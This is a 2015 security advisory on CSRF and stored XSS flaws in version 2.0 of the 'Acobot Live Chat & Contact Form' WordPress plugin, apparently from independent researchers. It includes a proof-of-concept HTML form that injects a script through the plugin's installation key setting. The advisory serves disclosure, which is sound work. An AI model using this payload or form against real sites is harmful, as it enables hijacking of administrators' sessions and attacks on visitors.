Title: WordPress 'Acobot Live Chat & Contact Form' CSRF/XSS Version: 2.0 Author: Morten N?rtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/01/26 Download: https://wordpress.org/plugins/acobot/ Contacted WordPress: 2015/01/26 ========================================================== ## Plugin description: ========================================================== Enhance your WordPress with a virtual robot in 3 minutes or less and boost your sales like never before. It's simple, easy and fast. ## CSRF: ========================================================== It is possible to change plugin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ========================================================== The installation key in the admin panel is stored and displayed unsanitized. This allows an attacker to perform XSS through that field. PoC: Log in as admin and submit the this form: <form method="POST" action="http://[URL]/wp-admin/options-general.php?page=acobot&update_account=something"> <input type="text" name="acobot_token" value=""/><script>alert(1)</script>"><br /> <input type="hidden" name="acobot_code_script" value=""><br /> <input type="submit"> </form> ## Solution ========================================================== No fix has been released.